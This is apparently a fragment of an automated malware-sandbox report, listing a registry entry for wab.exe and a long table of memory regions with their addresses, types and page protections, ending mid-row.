\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Usn
|
There are 24 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
A8FD000
|
direct allocation
|
page execute and read and write
|
|
|
|
23051000
|
trusted library allocation
|
page read and write
|
|
|
|
5654000
|
trusted library allocation
|
page read and write
|
|
|
|
80A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
2AD51831000
|
trusted library allocation
|
page read and write
|
|
|
|
2AD417C1000
|
trusted library allocation
|
page read and write
|
||
|
229EE000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
2AD410B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1A30000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1B10000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C19B0000
|
trusted library allocation
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
252EE000
|
trusted library allocation
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
600000
|
trusted library section
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD3F640000
|
heap
|
page read and write
|
||
|
7530000
|
heap
|
page readonly
|
||
|
A40000
|
heap
|
page read and write
|
||
|
80D0000
|
direct allocation
|
page read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C19CA000
|
trusted library allocation
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
2AD59D34000
|
heap
|
page read and write
|
||
|
327D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25341000
|
heap
|
page read and write
|
||
|
2AD41CBD000
|
trusted library allocation
|
page read and write
|
||
|
D4E000
|
stack
|
page read and write
|
||
|
68DB000
|
stack
|
page read and write
|
||
|
252F1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1A00000
|
trusted library allocation
|
page execute and read and write
|
||
|
540B000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6B5E000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22CE0000
|
remote allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
AE2ED7D000
|
stack
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
DDE000
|
stack
|
page read and write
|
||
|
6C99000
|
heap
|
page read and write
|
||
|
2AD3F850000
|
trusted library allocation
|
page read and write
|
||
|
45FD000
|
remote allocation
|
page execute and read and write
|
||
|
E9E000
|
stack
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C18CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
53A9000
|
trusted library allocation
|
page read and write
|
||
|
2AD41770000
|
heap
|
page execute and read and write
|
||
|
250D0000
|
trusted library allocation
|
page read and write
|
||
|
2AD41C56000
|
trusted library allocation
|
page read and write
|
||
|
4540000
|
remote allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
23157000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6F8E000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
77E0000
|
direct allocation
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
7FF7C1B30000
|
trusted library allocation
|
page read and write
|
||
|
651000
|
heap
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
2AD41C4E000
|
trusted library allocation
|
page read and write
|
||
|
25411000
|
heap
|
page read and write
|
||
|
7C5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
AE2EEFE000
|
stack
|
page read and write
|
||
|
7C0000
|
trusted library allocation
|
page read and write
|
||
|
53C9000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
AE2F078000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD41C52000
|
trusted library allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
529000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
8100000
|
direct allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F895000
|
heap
|
page read and write
|
||
|
22F20000
|
heap
|
page read and write
|
||
|
2AD41115000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
3286000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2533F000
|
heap
|
page read and write
|
||
|
2309D000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F5B0000
|
heap
|
page read and write
|
||
|
6C5000
|
heap
|
page read and write
|
||
|
25311000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
6D71000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
CFE000
|
stack
|
page read and write
|
||
|
2570C000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22B9E000
|
stack
|
page read and write
|
||
|
25516000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1813000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AD59CD1000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
23035000
|
trusted library allocation
|
page read and write
|
||
|
2AD417B0000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
80C0000
|
direct allocation
|
page read and write
|
||
|
2AD3F6AA000
|
heap
|
page read and write
|
||
|
25540000
|
trusted library allocation
|
page read and write
|
||
|
22DDC000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD41639000
|
heap
|
page read and write
|
||
|
2AD437E2000
|
trusted library allocation
|
page read and write
|
||
|
225E0000
|
direct allocation
|
page read and write
|
||
|
807C000
|
stack
|
page read and write
|
||
|
25368000
|
heap
|
page read and write
|
||
|
22CE0000
|
remote allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
75CA000
|
heap
|
page read and write
|
||
|
2532E000
|
heap
|
page read and write
|
||
|
2AD41080000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22A2F000
|
stack
|
page read and write
|
||
|
7BFC000
|
heap
|
page read and write
|
||
|
2AD59C66000
|
heap
|
page read and write
|
||
|
BCE000
|
stack
|
page read and write
|
||
|
8A40000
|
direct allocation
|
page execute and read and write
|
||
|
2AD3F860000
|
heap
|
page readonly
|
||
|
2AD41E7F000
|
trusted library allocation
|
page read and write
|
||
|
250D0000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
250C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C18C6000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6970000
|
heap
|
page read and write
|
||
|
225C0000
|
direct allocation
|
page read and write
|
||
|
671D000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF1000
|
trusted library allocation
|
page read and write
|
||
|
23020000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
794000
|
trusted library allocation
|
page read and write
|
||
|
C3130FD000
|
stack
|
page read and write
|
||
|
22E5E000
|
stack
|
page read and write
|
||
|
2AD41C43000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1AA0000
|
trusted library allocation
|
page read and write
|
||
|
2612E000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
23000000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1AC0000
|
trusted library allocation
|
page read and write
|
||
|
70EC000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF1000
|
trusted library allocation
|
page read and write
|
||
|
3292000
|
trusted library allocation
|
page read and write
|
||
|
25F2B000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
4C8E000
|
trusted library allocation
|
page read and write
|
||
|
252C9000
|
stack
|
page read and write
|
||
|
260ED000
|
stack
|
page read and write
|
||
|
6E20000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
C28000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
644000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1A60000
|
trusted library allocation
|
page read and write
|
||
|
75B4000
|
heap
|
page read and write
|
||
|
7FF7C19C1000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD42023000
|
trusted library allocation
|
page read and write
|
||
|
74DE000
|
stack
|
page read and write
|
||
|
6DE0000
|
trusted library allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD41632000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
23030000
|
trusted library allocation
|
page read and write
|
||
|
25540000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25540000
|
trusted library allocation
|
page read and write
|
||
|
2AD41C7B000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
2AD43086000
|
trusted library allocation
|
page read and write
|
||
|
2AD4184E000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6D00000
|
heap
|
page read and write
|
||
|
25570000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
24079000
|
trusted library allocation
|
page read and write
|
||
|
22F30000
|
trusted library allocation
|
page read and write
|
||
|
25520000
|
trusted library allocation
|
page execute and read and write
|
||
|
2524A000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
4D35000
|
trusted library allocation
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
56E000
|
stack
|
page read and write
|
||
|
2578D000
|
stack
|
page read and write
|
||
|
22F1D000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
23020000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1A80000
|
trusted library allocation
|
page read and write
|
||
|
2AD41671000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
564E000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
77F0000
|
heap
|
page read and write
|
||
|
3264000
|
trusted library allocation
|
page read and write
|
||
|
7BA0000
|
heap
|
page read and write
|
||
|
7FF7C1AF0000
|
trusted library allocation
|
page read and write
|
||
|
84F000
|
unkown
|
page read and write
|
||
|
6D51000
|
heap
|
page read and write
|
||
|
25570000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1A50000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1A90000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1A20000
|
trusted library allocation
|
page read and write
|
||
|
22610000
|
direct allocation
|
page read and write
|
||
|
2AD59CC7000
|
heap
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6DC0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
22620000
|
direct allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7490000
|
heap
|
page read and write
|
||
|
4407000
|
trusted library allocation
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
6A4000
|
heap
|
page read and write
|
||
|
22630000
|
direct allocation
|
page read and write
|
||
|
2AD517E1000
|
trusted library allocation
|
page read and write
|
||
|
6DD0000
|
trusted library allocation
|
page read and write
|
||
|
AE2F33E000
|
stack
|
page read and write
|
||
|
3273000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C182B000
|
trusted library allocation
|
page read and write
|
||
|
23092000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1AE0000
|
trusted library allocation
|
page read and write
|
||
|
53B1000
|
trusted library allocation
|
page read and write
|
||
|
25550000
|
trusted library allocation
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
7B1E000
|
stack
|
page read and write
|
||
|
22C3D000
|
stack
|
page read and write
|
||
|
2AD41110000
|
heap
|
page read and write
|
||
|
CD000
|
stack
|
page read and write
|
||
|
6ECE000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD42039000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
250BA000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD3F63C000
|
heap
|
page read and write
|
||
|
7FF7C19F2000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
326D000
|
trusted library allocation
|
page execute and read and write
|
||
|
240B6000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C19E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E4D000
|
stack
|
page read and write
|
||
|
47E000
|
unkown
|
page read and write
|
||
|
AE2E976000
|
stack
|
page read and write
|
||
|
22B50000
|
trusted library allocation
|
page read and write
|
||
|
2AD4361F000
|
trusted library allocation
|
page read and write
|
||
|
75AE000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD4369A000
|
trusted library allocation
|
page read and write
|
||
|
AE2F3BE000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6760000
|
direct allocation
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C19D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7540000
|
direct allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1A70000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD41D3F000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2532B000
|
heap
|
page read and write
|
||
|
250D0000
|
trusted library allocation
|
page read and write
|
||
|
6FCE000
|
stack
|
page read and write
|
||
|
23130000
|
trusted library allocation
|
page read and write
|
||
|
2AD59CF9000
|
heap
|
page read and write
|
||
|
77F7000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7558000
|
heap
|
page read and write
|
||
|
2AD59C5D000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD3F69C000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
25336000
|
heap
|
page read and write
|
||
|
67D0000
|
direct allocation
|
page read and write
|
||
|
216C58C0000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1B00000
|
trusted library allocation
|
page read and write
|
||
|
AE2EE3F000
|
stack
|
page read and write
|
||
|
250D0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
2AD435B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1B70000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F6A6000
|
heap
|
page read and write
|
||
|
22C7E000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD597C0000
|
heap
|
page read and write
|
||
|
25315000
|
heap
|
page read and write
|
||
|
7080000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF9000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD43577000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25860000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
heap
|
page read and write
|
||
|
7480000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
B2FD000
|
direct allocation
|
page execute and read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
2AD4357B000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
257CF000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD3F6EC000
|
heap
|
page read and write
|
||
|
2AD59C83000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
AE2EF7F000
|
stack
|
page read and write
|
||
|
7FF7C1AB0000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7F5C000
|
stack
|
page read and write
|
||
|
2AD59C30000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
4CB8000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
216C55F0000
|
heap
|
page read and write
|
||
|
250C0000
|
trusted library allocation
|
page read and write
|
||
|
216C5580000
|
heap
|
page read and write
|
||
|
22B2C000
|
stack
|
page read and write
|
||
|
329B000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AD3F607000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6E40000
|
trusted library allocation
|
page read and write
|
||
|
22D90000
|
direct allocation
|
page read and write
|
||
|
770000
|
trusted library section
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
63FD000
|
remote allocation
|
page execute and read and write
|
||
|
AE2FF8B000
|
stack
|
page read and write
|
||
|
2AD42001000
|
trusted library allocation
|
page read and write
|
||
|
2AD42A5D000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1930000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25540000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6960000
|
heap
|
page read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
2315D000
|
trusted library allocation
|
page read and write
|
||
|
75B9000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
8E8E000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7613000
|
heap
|
page read and write
|
||
|
AE2EC7E000
|
stack
|
page read and write
|
||
|
764B000
|
heap
|
page read and write
|
||
|
61D000
|
heap
|
page read and write
|
||
|
7B60000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD517CF000
|
trusted library allocation
|
page read and write
|
||
|
23010000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page read and write
|
||
|
7010000
|
trusted library allocation
|
page read and write
|
||
|
7C2000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1B80000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6E48000
|
trusted library allocation
|
page read and write
|
||
|
25410000
|
heap
|
page read and write
|
||
|
C10000
|
heap
|
page readonly
|
||
|
8080000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F6A0000
|
heap
|
page read and write
|
||
|
7FF7C1812000
|
trusted library allocation
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6790000
|
direct allocation
|
page read and write
|
||
|
2AD435A0000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F820000
|
trusted library allocation
|
page read and write
|
||
|
6DC7000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
CB8000
|
heap
|
page read and write
|
||
|
2AD43598000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1810000
|
trusted library allocation
|
page read and write
|
||
|
59FD000
|
remote allocation
|
page execute and read and write
|
||
|
230DA000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2534A000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
24051000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1B20000
|
trusted library allocation
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD41290000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
80F0000
|
direct allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
C60000
|
heap
|
page read and write
|
||
|
6770000
|
direct allocation
|
page read and write
|
||
|
7A0000
|
trusted library allocation
|
page read and write
|
||
|
7F1C000
|
stack
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
75C0000
|
heap
|
page read and write
|
||
|
689E000
|
stack
|
page read and write
|
||
|
7020000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F870000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
225A0000
|
direct allocation
|
page read and write
|
||
|
AE2F136000
|
stack
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
2AD4360E000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
4C11000
|
trusted library allocation
|
page read and write
|
||
|
2532C000
|
heap
|
page read and write
|
||
|
6E00000
|
trusted library allocation
|
page read and write
|
||
|
225F0000
|
direct allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
23020000
|
trusted library allocation
|
page read and write
|
||
|
8AFD000
|
direct allocation
|
page execute and read and write
|
||
|
AE2F239000
|
stack
|
page read and write
|
||
|
764B000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FE0000
|
trusted library allocation
|
page read and write
|
||
|
6DF0000
|
trusted library allocation
|
page read and write
|
||
|
22FF1000
|
trusted library allocation
|
page read and write
|
||
|
6D63000
|
heap
|
page read and write
|
||
|
AE2FF0D000
|
stack
|
page read and write
|
||
|
6B1E000
|
stack
|
page read and write
|
||
|
2315B000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
49B2000
|
trusted library allocation
|
page read and write
|
||
|
22FF5000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page read and write
|
||
|
2AD41777000
|
heap
|
page execute and read and write
|
||
|
7FF7C1814000
|
trusted library allocation
|
page read and write
|
||
|
7BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
250D0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD41691000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD3F5FD000
|
heap
|
page read and write
|
||
|
250D0000
|
trusted library allocation
|
page read and write
|
||
|
2AD435CC000
|
trusted library allocation
|
page read and write
|
||
|
22F27000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
4D0B000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7BEC000
|
heap
|
page read and write
|
||
|
16C000
|
stack
|
page read and write
|
||
|
2AD42050000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25F6C000
|
stack
|
page read and write
|
||
|
22AED000
|
stack
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
25411000
|
heap
|
page read and write
|
||
|
22CE0000
|
remote allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
22600000
|
direct allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
AE2EDFE000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7B5E000
|
stack
|
page read and write
|
||
|
2AD41C3A000
|
trusted library allocation
|
page read and write
|
||
|
2AD435B4000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
70A0000
|
trusted library allocation
|
page read and write
|
||
|
25FAE000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25311000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
216C56F0000
|
heap
|
page read and write
|
||
|
2532E000
|
heap
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
2AD416C0000
|
heap
|
page read and write
|
||
|
6DFD000
|
remote allocation
|
page execute and read and write
|
||
|
25590000
|
heap
|
page read and write
|
||
|
22FF1000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
2AD4360A000
|
trusted library allocation
|
page read and write
|
||
|
AE2F1B7000
